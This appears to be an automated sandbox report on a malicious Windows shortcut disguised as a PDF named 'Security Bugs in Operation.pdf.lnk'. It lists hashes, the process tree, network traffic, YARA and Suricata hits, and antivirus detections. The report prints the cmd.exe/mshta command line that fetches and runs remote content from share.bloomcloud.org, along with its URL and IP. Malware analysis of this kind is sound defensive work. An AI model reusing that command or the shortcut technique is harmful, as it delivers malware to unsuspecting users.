Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Sept. 4, 2021, 3:22 p.m.	Sept. 4, 2021, 3:24 p.m.

Size	945.6KB
Type	MS Windows shortcut, Item id list present, Points to a file or directory, Has Working directory, Has command line arguments, Icon number=24, Archive, ctime=Sun Feb 16 21:46:36 2020, mtime=Wed Oct 28 16:56:25 2020, atime=Sun Feb 16 21:46:36 2020, length=280064, window=hide
MD5	`02904e802b5dc2f85eec83e3c1948374`
SHA256	`96caa8b43589c1e768f3a0910df15eb9fd86ac69646858a78b0b91c35c1a5c07`
CRC32	`701A96E7`
ssdeep	`12288:Zx0KXPiZ5uTL8ZL0L3PsOfGgOtb1vnQfic6XKdr0n165shujrCiIhUfQNd6WOlBf:AK6wL8ZAL3EOK55+ddrc1ugNFqBiF6R`
Yara	Generic_Malware_Zero - Generic Malware Lnk_Format_Zero - LNK Format anti_vm_detect - Possibly employs anti-virtualization techniques

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "zzXiZZIejA" "C:\Users\test22\AppData\Local\Temp\Security Bugs in Operation.pdf.lnk"
1016
- cmd.exe "C:\Windows\System32\cmd.exe" /c start /b C:\Windows\System32\mshta https://share.bloomcloud.org/2qRa60mv2a5zatU3RmgAHlbjRh1klMFjgezI2pOL0Tk=
  2076
  - mshta.exe C:\Windows\System32\mshta https://share.bloomcloud.org/2qRa60mv2a5zatU3RmgAHlbjRh1klMFjgezI2pOL0Tk=
    2936

Name	Response	Post-Analysis Lookup
share.bloomcloud.org	A 139.180.164.131	139.180.164.131

IP Address	Status	Action
139.180.164.131	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49204 -> 139.180.164.131:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49204 139.180.164.131:443	C=US, O=Let's Encrypt, CN=R3	CN=bloomcloud.org	14:f1:38:d4:67:70:b8:bf:b6:b6:da:8a:3c:69:38:e2:92:24:20:1c

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 4, 2021, 3:22 p.m.		1	1	0

Performs some HTTP requests (1 event)

request

GET https://share.bloomcloud.org/2qRa60mv2a5zatU3RmgAHlbjRh1klMFjgezI2pOL0Tk=

Allocates read-write-execute memory (usually to unpack itself) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Sept. 4, 2021, 3:22 p.m.	process_identifier: 2936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72192000 process_handle: 0xffffffff	1	0	0

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\Security Bugs in Operation.pdf.lnk

Creates a suspicious process (2 events)

cmdline	C:\Windows\System32\mshta https://share.bloomcloud.org/2qRa60mv2a5zatU3RmgAHlbjRh1klMFjgezI2pOL0Tk=
cmdline	"C:\Windows\System32\cmd.exe" /c start /b C:\Windows\System32\mshta https://share.bloomcloud.org/2qRa60mv2a5zatU3RmgAHlbjRh1klMFjgezI2pOL0Tk=

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Sept. 4, 2021, 3:22 p.m.	process_identifier: 2936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x7ef80000 process_handle: 0xffffffff	1	0	0

Potentially malicious URLs were found in the process memory dump (1 event)

url	https://share.bloomcloud.org/2qRa60mv2a5zatU3RmgAHlbjRh1klMFjgezI2pOL0Tk=

Yara rule detected in process memory (39 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Communication using DGA	rule	Network_DGA
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Create a windows service	rule	Create_Service
description	Record Audio	rule	Sniff_Audio
description	Escalate priviledges	rule	Escalate_priviledges
description	Run a KeyLogger	rule	KeyLogger
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Take ScreenShot	rule	ScreenShot
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Steal credential	rule	local_credential_Steal
description	File Downloader	rule	Network_Downloader
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook

Disables proxy possibly for traffic interception (1 event)

Time & API	Arguments	Status	Return	Repeated
RegSetValueExA Sept. 4, 2021, 3:22 p.m.	key_handle: 0x000002c0 regkey_r: ProxyEnable reg_type: 4 (REG_DWORD) value: 0 regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1016 resumed a thread in remote process 2076
Process injection	Process 2076 resumed a thread in remote process 2936
NtResumeThread Sept. 4, 2021, 3:22 p.m.	thread_handle: 0x00000334 suspend_count: 1 process_identifier: 2076	1	0	0
NtResumeThread Sept. 4, 2021, 3:22 p.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 2936	1	0	0

File has been identified by 20 AntiVirus engines on VirusTotal as malicious (20 events)

Lionic	Trojan.WinLNK.Nioc.4!c
CAT-QuickHeal	LNK.Agent.41324
Arcabit	Heur.BZC.YAX.Nioc.1.078B6D01
Cyren	LNK/Trojan.AHUF-6
ESET-NOD32	LNK/Agent.GX
BitDefender	Heur.BZC.YAX.Nioc.1.078B6D01
MicroWorld-eScan	Heur.BZC.YAX.Nioc.1.078B6D01
Tencent	Heur:Trojan.Winlnk.Downloader.wya
Ad-Aware	Heur.BZC.YAX.Nioc.1.078B6D01
Sophos	Troj/DownLnk-X
FireEye	Heur.BZC.YAX.Nioc.1.078B6D01
Emsisoft	Heur.BZC.YAX.Nioc.1.078B6D01 (B)
MAX	malware (ai score=88)
GData	Heur.BZC.YAX.Nioc.1.078B6D01
AhnLab-V3	LNK/Autorun.Gen
VBA32	Trojan.Link.Crafted
ALYac	Heur.BZC.YAX.Nioc.1.078B6D01
Zoner	Probably Heur.LNKScript
Rising	Downloader.Mshta/LNK!1.BADA (CLASSIC)
SentinelOne	Static AI - Malicious LNK

Security Bugs in Operation.pdf.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All